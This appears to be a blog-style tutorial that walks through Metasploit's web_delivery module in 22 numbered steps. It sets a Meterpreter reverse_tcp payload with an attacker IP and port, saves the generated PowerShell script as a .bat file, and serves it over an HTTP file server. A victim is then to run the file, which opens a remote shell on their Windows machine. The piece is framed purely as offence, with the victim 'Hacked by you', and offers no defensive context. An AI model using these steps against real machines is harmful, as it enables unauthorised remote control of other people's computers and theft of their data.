Metasploits Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine.
This exploit requires a method of executing commands on the victim machine. In particular you must be able to reach the attacking machine from the victim. Remote command execution is a great example of an attack vector where using this module is possible. The web delivery script works on php, python, and powershell based applications.
Step 1 : First get your ip address with ifconfig command
Step 2 : Open MetaSploit with msfconsole command
Step 3 : Search web_delivery
Step 4 : use exploit/multi/script/web_delivery
Step 5 : Now Type Options
Step 6 : set payload windows/meterpreter/reverse_tcp
Next, we need to set the LHOST and LPORT exactly like we did with the Unix/Linux/OS X web delivery exploit.
Step 7 : set lhost 192.168.18.132 [Kali IP Address as per step 1]
Step 8 : set lport 4466
Step 9 : Type, show targets
Step 10 : set target 2
With the target set to 2, Metasploit will create a PowerShell script when we are ready to exploit.
Step 11 : Now type, run
Step 12 : Now copy the web delivery Script.
Step 13 : And paste it Leafpad.
Step 14 : And save at (fileName.bat).
Here i have saved a file on my kali Linux Desktop with name MetaSploit.bat
Step 15 : Share a file with HFS (HTTP file Sever)
HFS(HTTP file Sever) is default installed in Latest kali linux,if not installed,visit our article
How to send or receive files in Kali Linux - Using HFS(HTTP File Server)
Step 16 : Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.
Step 17 : Download the file and run it.
Step 18 : When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
A meterpreter session open!
Step 19 : Now type, sessions to list the active sessions
Step 20 : Connect to it with sessions 1
Step 21 : We now have a full Meterpreter shell to the target.Now the session has opened type sysinfo to get system information
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
Step 22 : And type shell to enter into Victims command prompt.